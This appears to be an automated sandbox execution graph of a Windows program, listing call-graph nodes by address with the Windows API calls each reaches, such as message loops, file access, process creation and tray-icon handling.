                                                                                execution_graph 93986 7ff79f8ce263 93987 7ff79f8ce271 93986->93987 93998 7ff79f882680 93986->93998 93987->93987 93988 7ff79f8829c8 PeekMessageW 93988->93998 93989 7ff79f8826da GetInputState 93989->93988 93989->93998 93991 7ff79f8cd181 TranslateAcceleratorW 93991->93998 93992 7ff79f882a33 PeekMessageW 93992->93998 93993 7ff79f882a1f TranslateMessage DispatchMessageW 93993->93992 93994 7ff79f8828b9 timeGetTime 93994->93998 93995 7ff79f882856 93996 7ff79f8cd2bb timeGetTime 94053 7ff79f892ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93996->94053 93998->93988 93998->93989 93998->93991 93998->93992 93998->93993 93998->93994 93998->93995 93998->93996 94004 7ff79f8f34e4 77 API calls 93998->94004 94006 7ff79f882b70 93998->94006 94013 7ff79f8866c0 93998->94013 94047 7ff79f892de8 93998->94047 94052 7ff79f882e30 300 API calls 2 library calls 93998->94052 94054 7ff79f8f3a28 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93998->94054 94055 7ff79f883c20 93998->94055 94076 7ff79f90a320 300 API calls Concurrency::wait 93998->94076 94004->93998 94007 7ff79f882b96 94006->94007 94009 7ff79f882ba9 94006->94009 94077 7ff79f882050 94007->94077 94097 7ff79f8f34e4 77 API calls 3 library calls 94009->94097 94010 7ff79f882b9e 94010->93998 94012 7ff79f8ce55c 94024 7ff79f88673b memcpy_s Concurrency::wait 94013->94024 94014 7ff79f8d1fac 94016 7ff79f8d1fbe 94014->94016 94241 7ff79f90ab30 300 API calls Concurrency::wait 94014->94241 94016->93998 94019 7ff79f886c0f 94020 7ff79f8d1fc9 94019->94020 94021 7ff79f886c3d 94019->94021 94242 7ff79f8f34e4 77 API calls 3 library calls 94020->94242 94238 7ff79f87ee20 5 API calls Concurrency::wait 94021->94238 94024->94014 94024->94019 94024->94020 94026 7ff79f886c4a 94024->94026 94028 7ff79f886c78 94024->94028 94030 7ff79f886d40 9 API calls 94024->94030 94031 7ff79f894c68 4 API calls 94024->94031 94034 7ff79f883c20 300 API calls 94024->94034 94035 7ff79f8d2032 94024->94035 94036 7ff79f8d20c1 94024->94036 94039 7ff79f886b15 94024->94039 94112 7ff79f8f8ea0 94024->94112 94145 7ff79f90f160 94024->94145 94150 7ff79f8f5b80 94024->94150 94156 7ff79f8f8e98 94024->94156 94189 7ff79f8f63dc 94024->94189 94194 7ff79f8f7e48 94024->94194 94228 7ff79f90f0ac 94024->94228 94231 7ff79f895114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94024->94231 94232 7ff79f87ec00 94024->94232 94237 7ff79f8950b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94024->94237 94244 7ff79f908d98 49 API calls Concurrency::wait 94024->94244 94245 7ff79f87e0a8 94024->94245 94239 7ff79f891fcc 300 API calls 94026->94239 94240 7ff79f88e8f4 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94028->94240 94030->94024 94031->94024 94034->94024 94243 7ff79f8f34e4 77 API calls 3 library calls 94035->94243 94036->94039 94249 7ff79f8f34e4 77 API calls 3 library calls 94036->94249 94039->93998 94049 7ff79f892e0d 94047->94049 94051 7ff79f892e2a 94047->94051 94048 7ff79f892e5b IsDialogMessageW 94048->94049 94048->94051 94049->93998 94050 7ff79f8d9d94 GetClassLongPtrW 94050->94048 94050->94051 94051->94048 94051->94049 94051->94050 94052->93998 94053->93998 94054->93998 94062 7ff79f883c80 94055->94062 94056 7ff79f8d05be 94482 7ff79f8f34e4 77 API calls 3 library calls 94056->94482 94058 7ff79f884a8f 94061 7ff79f884aa9 94058->94061 94065 7ff79f8cfefe 94058->94065 94071 7ff79f884ac0 94058->94071 94060 7ff79f8d05d1 94060->93998 94064 7ff79f87e0a8 4 API calls 94061->94064 94061->94071 94062->94056 94062->94058 94062->94061 94063 7ff79f884fe7 94062->94063 94067 7ff79f87e0a8 4 API calls 94062->94067 94069 7ff79f883dde 94062->94069 94072 7ff79f895114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94062->94072 94073 7ff79f894f0c 34 API calls __scrt_initialize_thread_safe_statics 94062->94073 94074 7ff79f8950b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 94062->94074 94075 7ff79f879640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94062->94075 94480 7ff79f885360 300 API calls Concurrency::wait 94062->94480 94481 7ff79f8f34e4 77 API calls 3 library calls 94062->94481 94066 7ff79f87e0a8 4 API calls 94063->94066 94064->94069 94068 7ff79f87e0a8 4 API calls 94065->94068 94066->94069 94067->94062 94068->94071 94069->93998 94071->93998 94072->94062 94073->94062 94074->94062 94075->94062 94076->93998 94078 7ff79f883c20 300 API calls 94077->94078 94082 7ff79f8820a8 94078->94082 94079 7ff79f88212d 94079->94010 94081 7ff79f8cd08d 94082->94079 94083 7ff79f882552 94082->94083 94089 7ff79f882244 94082->94089 94091 7ff79f8cd06f 94082->94091 94093 7ff79f8823cb memcpy_s 94082->94093 94094 7ff79f8822a5 memcpy_s 94082->94094 94085 7ff79f894c68 4 API calls 94083->94085 94084 7ff79f8cd036 94106 7ff79f87ee20 5 API calls Concurrency::wait 94084->94106 94085->94093 94088 7ff79f8cd062 94107 7ff79f87ee20 5 API calls Concurrency::wait 94088->94107 94089->94093 94098 7ff79f881ce4 301 API calls Concurrency::wait 94089->94098 94108 7ff79f8f34e4 77 API calls 3 library calls 94091->94108 94093->94084 94096 7ff79f8f34e4 77 API calls 94093->94096 94105 7ff79f874a60 300 API calls 94093->94105 94094->94093 94099 7ff79f894c68 94094->94099 94096->94093 94097->94012 94098->94094 94101 7ff79f894c2c 94099->94101 94100 7ff79f894c50 94100->94094 94101->94099 94101->94100 94109 7ff79f89925c EnterCriticalSection LeaveCriticalSection abort 94101->94109 94110 7ff79f895600 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 94101->94110 94111 7ff79f895620 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 94101->94111 94105->94093 94106->94088 94107->94091 94108->94081 94109->94101 94111->94101 94113 7ff79f8fa680 94112->94113 94120 7ff79f8fa71a 94113->94120 94287 7ff79f87834c 94113->94287 94114 7ff79f8fa6f3 94114->94024 94117 7ff79f8fa7fd 94328 7ff79f8f1864 6 API calls 94117->94328 94118 7ff79f87d4cc 48 API calls 94121 7ff79f8fa6d0 94118->94121 94120->94114 94120->94117 94124 7ff79f8fa770 94120->94124 94296 7ff79f876838 94121->94296 94122 7ff79f8fa805 94329 7ff79f8eb334 94122->94329 94250 7ff79f87d4cc 94124->94250 94126 7ff79f8fa6e6 94126->94114 94312 7ff79f877ab8 94126->94312 94130 7ff79f8fa7e0 Concurrency::wait 94130->94114 94332 7ff79f878314 94130->94332 94131 7ff79f8fa778 94132 7ff79f8fa7ee 94131->94132 94133 7ff79f8fa7a7 94131->94133 94269 7ff79f8eb3a8 94132->94269 94315 7ff79f8798e8 94133->94315 94136 7ff79f8fa7b5 94138 7ff79f87e0a8 4 API calls 94136->94138 94140 7ff79f8fa7c2 94138->94140 94318 7ff79f8771f8 94140->94318 94141 7ff79f877ab8 CloseHandle 94141->94114 94143 7ff79f8fa7d3 94144 7ff79f8eb3a8 12 API calls 94143->94144 94144->94130 94368 7ff79f90f630 94145->94368 94147 7ff79f90f1cd 94147->94024 94148 7ff79f90f182 94148->94147 94436 7ff79f87ee20 5 API calls Concurrency::wait 94148->94436 94151 7ff79f8f5ba5 94150->94151 94152 7ff79f8f5ba9 94151->94152 94153 7ff79f8f5be5 FindClose 94151->94153 94154 7ff79f8f5bd5 94151->94154 94152->94024 94153->94152 94154->94152 94155 7ff79f877ab8 CloseHandle 94154->94155 94155->94152 94157 7ff79f8fa680 94156->94157 94158 7ff79f87834c 5 API calls 94157->94158 94163 7ff79f8fa71a 94157->94163 94159 7ff79f8fa6be 94158->94159 94161 7ff79f87d4cc 48 API calls 94159->94161 94160 7ff79f8fa7fd 94465 7ff79f8f1864 6 API calls 94160->94465 94165 7ff79f8fa6d0 94161->94165 94163->94160 94164 7ff79f8fa6f3 94163->94164 94168 7ff79f8fa770 94163->94168 94164->94024 94167 7ff79f876838 16 API calls 94165->94167 94166 7ff79f8fa805 94172 7ff79f8eb334 4 API calls 94166->94172 94169 7ff79f8fa6e2 94167->94169 94171 7ff79f87d4cc 48 API calls 94168->94171 94169->94163 94170 7ff79f8fa6e6 94169->94170 94170->94164 94173 7ff79f877ab8 CloseHandle 94170->94173 94178 7ff79f8fa778 94171->94178 94188 7ff79f8fa7e0 Concurrency::wait 94172->94188 94173->94164 94174 7ff79f8fa7ee 94176 7ff79f8eb3a8 12 API calls 94174->94176 94175 7ff79f8fa7a7 94177 7ff79f8798e8 4 API calls 94175->94177 94176->94188 94179 7ff79f8fa7b5 94177->94179 94178->94174 94178->94175 94181 7ff79f87e0a8 4 API calls 94179->94181 94180 7ff79f878314 CloseHandle 94182 7ff79f8fa85c 94180->94182 94183 7ff79f8fa7c2 94181->94183 94182->94164 94184 7ff79f877ab8 CloseHandle 94182->94184 94185 7ff79f8771f8 4 API calls 94183->94185 94184->94164 94186 7ff79f8fa7d3 94185->94186 94187 7ff79f8eb3a8 12 API calls 94186->94187 94187->94188 94188->94164 94188->94180 94190 7ff79f87d4cc 48 API calls 94189->94190 94191 7ff79f8f63f8 94190->94191 94466 7ff79f8ebdec 94191->94466 94193 7ff79f8f6404 94193->94024 94195 7ff79f8f7e79 94194->94195 94196 7ff79f879640 4 API calls 94195->94196 94220 7ff79f8f7f55 Concurrency::wait 94195->94220 94198 7ff79f8f7ea6 94196->94198 94197 7ff79f87834c 5 API calls 94199 7ff79f8f7f99 94197->94199 94200 7ff79f879640 4 API calls 94198->94200 94202 7ff79f87d4cc 48 API calls 94199->94202 94201 7ff79f8f7eaf 94200->94201 94203 7ff79f87d4cc 48 API calls 94201->94203 94204 7ff79f8f7fab 94202->94204 94205 7ff79f8f7ebe 94203->94205 94206 7ff79f876838 16 API calls 94204->94206 94474 7ff79f8774ac RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94205->94474 94208 7ff79f8f7fba 94206->94208 94210 7ff79f8f7fbe GetLastError 94208->94210 94214 7ff79f8f7ff5 94208->94214 94209 7ff79f8f7ed8 94475 7ff79f877c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94209->94475 94212 7ff79f8f7fd8 94210->94212 94217 7ff79f877ab8 CloseHandle 94212->94217 94222 7ff79f8f7fe5 94212->94222 94213 7ff79f8f7f07 94213->94220 94476 7ff79f8ebdd4 lstrlenW GetFileAttributesW FindFirstFileW FindClose 94213->94476 94215 7ff79f879640 4 API calls 94214->94215 94218 7ff79f8f8035 94215->94218 94217->94222 94218->94222 94478 7ff79f8e0d38 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94218->94478 94219 7ff79f8f7f17 94219->94220 94221 7ff79f8f7f1b 94219->94221 94220->94197 94220->94222 94224 7ff79f87ec00 4 API calls 94221->94224 94222->94024 94225 7ff79f8f7f28 94224->94225 94477 7ff79f8ebab8 8 API calls Concurrency::wait 94225->94477 94227 7ff79f8f7f31 Concurrency::wait 94227->94220 94229 7ff79f90f630 164 API calls 94228->94229 94230 7ff79f90f0c2 94229->94230 94230->94024 94233 7ff79f87ec1d 94232->94233 94234 7ff79f8ca5a2 94233->94234 94235 7ff79f894c68 4 API calls 94233->94235 94236 7ff79f87ec55 memcpy_s 94235->94236 94236->94024 94238->94026 94239->94028 94240->94028 94241->94016 94242->94039 94243->94039 94244->94024 94246 7ff79f87e0bb 94245->94246 94247 7ff79f87e0b6 94245->94247 94246->94024 94479 7ff79f87f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94247->94479 94249->94039 94251 7ff79f87d50b 94250->94251 94252 7ff79f87d4f2 94250->94252 94253 7ff79f87d53e 94251->94253 94254 7ff79f87d513 94251->94254 94252->94131 94256 7ff79f8c9cc4 94253->94256 94257 7ff79f87d550 94253->94257 94263 7ff79f8c9bbc 94253->94263 94335 7ff79f89956c 31 API calls 94254->94335 94338 7ff79f899538 31 API calls 94256->94338 94336 7ff79f894834 46 API calls 94257->94336 94259 7ff79f87d522 94264 7ff79f87ec00 4 API calls 94259->94264 94261 7ff79f8c9cdc 94265 7ff79f894c68 4 API calls 94263->94265 94268 7ff79f8c9c3e Concurrency::wait wcscpy 94263->94268 94264->94252 94266 7ff79f8c9c0a 94265->94266 94267 7ff79f87ec00 4 API calls 94266->94267 94267->94268 94337 7ff79f894834 46 API calls 94268->94337 94270 7ff79f8eb42a 94269->94270 94271 7ff79f8eb3c8 94269->94271 94274 7ff79f8eb334 4 API calls 94270->94274 94272 7ff79f8eb3d0 94271->94272 94273 7ff79f8eb41e 94271->94273 94276 7ff79f8eb3f1 94272->94276 94277 7ff79f8eb3dd 94272->94277 94346 7ff79f8eb458 8 API calls 94273->94346 94278 7ff79f8eb410 Concurrency::wait 94274->94278 94344 7ff79f87a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94276->94344 94342 7ff79f87a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94277->94342 94278->94130 94281 7ff79f8eb3e2 94343 7ff79f894120 6 API calls 94281->94343 94282 7ff79f8eb3f6 94345 7ff79f8eb270 6 API calls 94282->94345 94285 7ff79f8eb3ef 94339 7ff79f8eb384 94285->94339 94288 7ff79f894c68 4 API calls 94287->94288 94289 7ff79f878363 94288->94289 94290 7ff79f878314 CloseHandle 94289->94290 94291 7ff79f87836f 94290->94291 94347 7ff79f879640 94291->94347 94293 7ff79f878378 94294 7ff79f878314 CloseHandle 94293->94294 94295 7ff79f878380 94294->94295 94295->94118 94297 7ff79f878314 CloseHandle 94296->94297 94298 7ff79f87685a 94297->94298 94299 7ff79f87687d CreateFileW 94298->94299 94300 7ff79f8bcaa8 94298->94300 94305 7ff79f8768ab 94299->94305 94301 7ff79f8bcaae CreateFileW 94300->94301 94309 7ff79f8768d9 94300->94309 94302 7ff79f8bcae6 94301->94302 94301->94305 94352 7ff79f876a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94302->94352 94304 7ff79f8bcaf3 94304->94305 94311 7ff79f8768e4 94305->94311 94350 7ff79f8768f4 9 API calls 94305->94350 94307 7ff79f8768c1 94307->94309 94351 7ff79f876a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94307->94351 94310 7ff79f8eb334 4 API calls 94309->94310 94309->94311 94310->94311 94311->94120 94311->94126 94353 7ff79f8782e4 94312->94353 94316 7ff79f894c68 4 API calls 94315->94316 94317 7ff79f879918 94316->94317 94317->94136 94319 7ff79f87721c 94318->94319 94323 7ff79f8bcd0c 94318->94323 94320 7ff79f877274 94319->94320 94324 7ff79f8bcd66 memcpy_s 94319->94324 94358 7ff79f87b960 94320->94358 94322 7ff79f877283 memcpy_s 94322->94143 94325 7ff79f894c68 4 API calls 94323->94325 94326 7ff79f894c68 4 API calls 94324->94326 94325->94324 94327 7ff79f8bcdda memcpy_s 94326->94327 94328->94122 94363 7ff79f8eb188 94329->94363 94333 7ff79f87833d CloseHandle 94332->94333 94334 7ff79f87832a 94332->94334 94333->94334 94334->94114 94334->94141 94335->94259 94336->94259 94337->94256 94338->94261 94340 7ff79f8eb334 4 API calls 94339->94340 94341 7ff79f8eb399 94340->94341 94341->94278 94342->94281 94343->94285 94344->94282 94345->94285 94346->94278 94348 7ff79f894c68 4 API calls 94347->94348 94349 7ff79f879663 94348->94349 94349->94293 94350->94307 94351->94309 94352->94304 94354 7ff79f878314 CloseHandle 94353->94354 94355 7ff79f8782f2 Concurrency::wait 94354->94355 94356 7ff79f878314 CloseHandle 94355->94356 94357 7ff79f878303 94356->94357 94359 7ff79f87b981 94358->94359 94362 7ff79f87b976 memcpy_s 94358->94362 94360 7ff79f8bef2a 94359->94360 94361 7ff79f894c68 4 API calls 94359->94361 94361->94362 94362->94322 94364 7ff79f8eb193 94363->94364 94365 7ff79f8eb19c WriteFile 94363->94365 94367 7ff79f8eb208 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94364->94367 94365->94130 94367->94365 94369 7ff79f90f671 __scrt_get_show_window_mode 94368->94369 94370 7ff79f87d4cc 48 API calls 94369->94370 94371 7ff79f90f74d 94370->94371 94437 7ff79f87e330 94371->94437 94373 7ff79f90f759 94374 7ff79f90f840 94373->94374 94375 7ff79f90f762 94373->94375 94377 7ff79f90f87d GetCurrentDirectoryW 94374->94377 94380 7ff79f87d4cc 48 API calls 94374->94380 94376 7ff79f87d4cc 48 API calls 94375->94376 94378 7ff79f90f777 94376->94378 94379 7ff79f894c68 4 API calls 94377->94379 94381 7ff79f87e330 4 API calls 94378->94381 94382 7ff79f90f8a7 GetCurrentDirectoryW 94379->94382 94383 7ff79f90f85c 94380->94383 94384 7ff79f90f783 94381->94384 94385 7ff79f90f8b5 94382->94385 94386 7ff79f87e330 4 API calls 94383->94386 94387 7ff79f87d4cc 48 API calls 94384->94387 94388 7ff79f90f8f0 94385->94388 94450 7ff79f88f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94385->94450 94389 7ff79f90f868 94386->94389 94390 7ff79f90f798 94387->94390 94394 7ff79f90f901 94388->94394 94395 7ff79f90f905 94388->94395 94389->94377 94389->94388 94392 7ff79f87e330 4 API calls 94390->94392 94396 7ff79f90f7a4 94392->94396 94393 7ff79f90f8d0 94451 7ff79f88f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94393->94451 94402 7ff79f90fa0f CreateProcessW 94394->94402 94403 7ff79f90f972 94394->94403 94453 7ff79f8efddc 8 API calls 94395->94453 94399 7ff79f87d4cc 48 API calls 94396->94399 94404 7ff79f90f7b9 94399->94404 94400 7ff79f90f8e0 94452 7ff79f88f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94400->94452 94401 7ff79f90f90e 94454 7ff79f8efca8 8 API calls 94401->94454 94418 7ff79f90f9b4 94402->94418 94456 7ff79f8dd1f8 99 API calls 94403->94456 94408 7ff79f87e330 4 API calls 94404->94408 94410 7ff79f90f7c5 94408->94410 94409 7ff79f90f926 94455 7ff79f8efafc 8 API calls ~SyncLockT 94409->94455 94412 7ff79f90f806 GetSystemDirectoryW 94410->94412 94413 7ff79f87d4cc 48 API calls 94410->94413 94414 7ff79f894c68 4 API calls 94412->94414 94415 7ff79f90f7e1 94413->94415 94417 7ff79f90f830 GetSystemDirectoryW 94414->94417 94419 7ff79f87e330 4 API calls 94415->94419 94416 7ff79f90f94f 94416->94394 94417->94385 94420 7ff79f90fabe CloseHandle 94418->94420 94426 7ff79f90fa64 94418->94426 94421 7ff79f90f7ed 94419->94421 94422 7ff79f90facc 94420->94422 94423 7ff79f90faf5 94420->94423 94421->94385 94421->94412 94457 7ff79f8ef7dc 94422->94457 94424 7ff79f90fafe 94423->94424 94428 7ff79f90fb26 CloseHandle 94423->94428 94432 7ff79f90faa3 94424->94432 94429 7ff79f90fa84 GetLastError 94426->94429 94428->94432 94429->94432 94441 7ff79f8ef51c 94432->94441 94436->94147 94438 7ff79f87e342 94437->94438 94439 7ff79f894c68 4 API calls 94438->94439 94440 7ff79f87e361 wcscpy 94439->94440 94440->94373 94442 7ff79f8ef7dc CloseHandle 94441->94442 94443 7ff79f8ef52a 94442->94443 94462 7ff79f8ef7b8 94443->94462 94446 7ff79f8ef7b8 ~SyncLockT CloseHandle 94447 7ff79f8ef53c 94446->94447 94448 7ff79f8ef7b8 ~SyncLockT CloseHandle 94447->94448 94449 7ff79f8ef545 94448->94449 94449->94148 94450->94393 94451->94400 94452->94388 94453->94401 94454->94409 94455->94416 94456->94418 94458 7ff79f8ef7b8 ~SyncLockT CloseHandle 94457->94458 94459 7ff79f8ef7ee 94458->94459 94460 7ff79f8ef7b8 ~SyncLockT CloseHandle 94459->94460 94461 7ff79f8ef7f7 94460->94461 94463 7ff79f8ef533 94462->94463 94464 7ff79f8ef7c9 CloseHandle 94462->94464 94463->94446 94464->94463 94465->94166 94469 7ff79f8ec7c0 lstrlenW 94466->94469 94470 7ff79f8ec7dd GetFileAttributesW 94469->94470 94471 7ff79f8ebdf5 94469->94471 94470->94471 94472 7ff79f8ec7eb FindFirstFileW 94470->94472 94471->94193 94472->94471 94473 7ff79f8ec7ff FindClose 94472->94473 94473->94471 94474->94209 94475->94213 94476->94219 94477->94227 94478->94222 94479->94246 94480->94062 94481->94062 94482->94060 94483 7ff79f88447b 94488 7ff79f8858d0 94483->94488 94485 7ff79f88448a 94518 7ff79f8f34e4 77 API calls 3 library calls 94485->94518 94487 7ff79f8d0550 94489 7ff79f8858fc 94488->94489 94494 7ff79f885976 94488->94494 94490 7ff79f88596d 94489->94490 94491 7ff79f88622b 94489->94491 94489->94494 94517 7ff79f885990 94489->94517 94493 7ff79f885a47 94490->94493 94490->94494 94491->94517 94526 7ff79f88e65c 36 API calls 94491->94526 94495 7ff79f886355 94493->94495 94514 7ff79f88597f 94493->94514 94515 7ff79f885bd6 94493->94515 94493->94517 94496 7ff79f8d1ab5 94494->94496 94497 7ff79f886449 94494->94497 94510 7ff79f8d1aca 94494->94510 94494->94514 94501 7ff79f886367 94495->94501 94495->94515 94496->94510 94496->94514 94499 7ff79f87d4cc 48 API calls 94497->94499 94503 7ff79f886451 94499->94503 94500 7ff79f8d1af3 94524 7ff79f87fd6c 36 API calls 94500->94524 94519 7ff79f87ef68 36 API calls 94501->94519 94507 7ff79f87d4cc 48 API calls 94503->94507 94506 7ff79f87fd6c 36 API calls 94506->94514 94509 7ff79f88645d 94507->94509 94508 7ff79f88636f 94520 7ff79f88e65c 36 API calls 94508->94520 94522 7ff79f891ad0 CompareStringW 94509->94522 94510->94517 94523 7ff79f87fd6c 36 API calls 94510->94523 94512 7ff79f87d4cc 48 API calls 94512->94514 94514->94506 94514->94512 94514->94515 94514->94517 94521 7ff79f891ad0 CompareStringW 94514->94521 94515->94517 94525 7ff79f87fd6c 36 API calls 94515->94525 94517->94485 94518->94487 94519->94508 94520->94517 94521->94514 94522->94514 94523->94500 94524->94517 94525->94517 94526->94517 94527 7ff79f875dec 94528 7ff79f875df4 94527->94528 94529 7ff79f875e98 94528->94529 94530 7ff79f875e28 94528->94530 94548 7ff79f875e96 94528->94548 94532 7ff79f875e9e 94529->94532 94533 7ff79f8bc229 94529->94533 94534 7ff79f875e35 94530->94534 94535 7ff79f875f21 PostQuitMessage 94530->94535 94531 7ff79f875e6b DefWindowProcW 94557 7ff79f875e7c 94531->94557 94537 7ff79f875ecc SetTimer RegisterWindowMessageW 94532->94537 94538 7ff79f875ea5 94532->94538 94583 7ff79f88ede4 8 API calls 94533->94583 94539 7ff79f8bc2af 94534->94539 94540 7ff79f875e40 94534->94540 94535->94557 94541 7ff79f875efc CreatePopupMenu 94537->94541 94537->94557 94546 7ff79f875eae KillTimer 94538->94546 94547 7ff79f8bc1b8 94538->94547 94595 7ff79f8ea40c 16 API calls __scrt_get_show_window_mode 94539->94595 94542 7ff79f875f2b 94540->94542 94543 7ff79f875e49 94540->94543 94541->94557 94573 7ff79f894610 94542->94573 94543->94548 94555 7ff79f875f0b 94543->94555 94556 7ff79f875e5f 94543->94556 94545 7ff79f8bc255 94584 7ff79f892c44 47 API calls Concurrency::wait 94545->94584 94569 7ff79f875d88 94546->94569 94552 7ff79f8bc1f7 MoveWindow 94547->94552 94553 7ff79f8bc1bd 94547->94553 94548->94531 94549 7ff79f8bc2c3 94549->94531 94549->94557 94552->94557 94558 7ff79f8bc1c2 94553->94558 94559 7ff79f8bc1e4 SetFocus 94553->94559 94581 7ff79f875f3c 26 API calls __scrt_get_show_window_mode 94555->94581 94556->94531 94566 7ff79f875d88 Shell_NotifyIconW 94556->94566 94558->94556 94562 7ff79f8bc1cb 94558->94562 94559->94557 94582 7ff79f88ede4 8 API calls 94562->94582 94564 7ff79f875f1f 94564->94557 94567 7ff79f8bc280 94566->94567 94585 7ff79f876258 94567->94585 94570 7ff79f875de4 94569->94570 94571 7ff79f875d99 __scrt_get_show_window_mode 94569->94571 94580 7ff79f877098 DeleteObject DestroyWindow Concurrency::wait 94570->94580 94572 7ff79f875db8 Shell_NotifyIconW 94571->94572 94572->94570 94574 7ff79f89461a __scrt_get_show_window_mode 94573->94574 94575 7ff79f8946db 94573->94575 94596 7ff79f8772c8 94574->94596 94575->94557 94577 7ff79f8946a2 KillTimer SetTimer 94577->94575 94578 7ff79f894660 94578->94577 94579 7ff79f8daaa1 Shell_NotifyIconW 94578->94579 94579->94577 94580->94557 94581->94564 94582->94557 94583->94545 94584->94556 94586 7ff79f876287 __scrt_get_show_window_mode 94585->94586 94640 7ff79f8761c4 94586->94640 94590 7ff79f87634e Shell_NotifyIconW 94593 7ff79f8772c8 6 API calls 94590->94593 94591 7ff79f8bc644 Shell_NotifyIconW 94592 7ff79f87632d 94592->94590 94592->94591 94594 7ff79f876365 94593->94594 94594->94548 94595->94549 94597 7ff79f8773bc Concurrency::wait 94596->94597 94598 7ff79f8772f4 94596->94598 94597->94578 94599 7ff79f8798e8 4 API calls 94598->94599 94600 7ff79f877303 94599->94600 94601 7ff79f8bcdfc LoadStringW 94600->94601 94602 7ff79f877310 94600->94602 94604 7ff79f8bce1e 94601->94604 94618 7ff79f877cf4 94602->94618 94606 7ff79f87e0a8 4 API calls 94604->94606 94605 7ff79f877324 94607 7ff79f8bce30 94605->94607 94608 7ff79f877336 94605->94608 94615 7ff79f87734f wcscpy __scrt_get_show_window_mode 94606->94615 94629 7ff79f877c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94607->94629 94608->94604 94610 7ff79f877343 94608->94610 94628 7ff79f877c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94610->94628 94612 7ff79f8bce3c 94613 7ff79f8771f8 4 API calls 94612->94613 94612->94615 94614 7ff79f8bce63 94613->94614 94617 7ff79f8771f8 4 API calls 94614->94617 94616 7ff79f8773a3 Shell_NotifyIconW 94615->94616 94616->94597 94617->94615 94619 7ff79f8bd2c8 94618->94619 94621 7ff79f877d0d 94618->94621 94631 7ff79f87dda4 94619->94631 94623 7ff79f877d24 94621->94623 94626 7ff79f877d51 94621->94626 94622 7ff79f8bd2d3 94630 7ff79f877e4c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94623->94630 94625 7ff79f877d2f memcpy_s 94625->94605 94626->94622 94627 7ff79f894c68 4 API calls 94626->94627 94627->94625 94628->94615 94629->94612 94630->94625 94632 7ff79f87dda9 94631->94632 94633 7ff79f87ddc7 memcpy_s 94631->94633 94632->94633 94635 7ff79f87a7c0 94632->94635 94633->94622 94633->94633 94637 7ff79f87a7ed 94635->94637 94639 7ff79f87a7dd memcpy_s 94635->94639 94636 7ff79f8be7da 94637->94636 94638 7ff79f894c68 4 API calls 94637->94638 94638->94639 94639->94633 94641 7ff79f8bc5f8 94640->94641 94642 7ff79f8761e0 94640->94642 94641->94642 94643 7ff79f8bc602 DestroyIcon 94641->94643 94642->94592 94644 7ff79f8ead94 39 API calls wcsftime 94642->94644 94643->94642 94644->94592 94645 7ff79f8cf890 94654 7ff79f87e18c 94645->94654 94647 7ff79f8cf8a9 94648 7ff79f8cf915 Concurrency::wait 94647->94648 94660 7ff79f892ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94647->94660 94651 7ff79f8d03e1 Concurrency::wait 94648->94651 94662 7ff79f8f34e4 77 API calls 3 library calls 94648->94662 94652 7ff79f8cf8f6 94652->94648 94661 7ff79f8f1464 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94652->94661 94655 7ff79f87e1a7 94654->94655 94656 7ff79f87e1c2 94654->94656 94663 7ff79f87ee20 5 API calls Concurrency::wait 94655->94663 94658 7ff79f87e1af 94656->94658 94664 7ff79f87ee20 5 API calls Concurrency::wait 94656->94664 94658->94647 94660->94652 94662->94651 94663->94658 94664->94658 94665 7ff79f8cb221 94666 7ff79f8cb22a 94665->94666 94673 7ff79f880378 94665->94673 94688 7ff79f8e47bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94666->94688 94668 7ff79f8cb241 94689 7ff79f8e4708 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94668->94689 94670 7ff79f8cb264 94671 7ff79f883c20 300 API calls 94670->94671 94672 7ff79f8cb292 94671->94672 94680 7ff79f880405 94672->94680 94690 7ff79f908d98 49 API calls Concurrency::wait 94672->94690 94682 7ff79f87f7b8 94673->94682 94676 7ff79f8cb2d9 Concurrency::wait 94676->94673 94691 7ff79f8e47bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94676->94691 94678 7ff79f87e0a8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94678->94680 94680->94678 94681 7ff79f88070a 94680->94681 94692 7ff79f87ee20 5 API calls Concurrency::wait 94680->94692 94685 7ff79f87f7d5 94682->94685 94683 7ff79f87f7de 94683->94680 94684 7ff79f879640 4 API calls 94684->94685 94685->94683 94685->94684 94686 7ff79f87e0a8 4 API calls 94685->94686 94687 7ff79f87f7b8 4 API calls 94685->94687 94686->94685 94687->94685 94688->94668 94689->94670 94690->94676 94691->94676 94692->94680 94693 7ff79f882bf8 94696 7ff79f87ed44 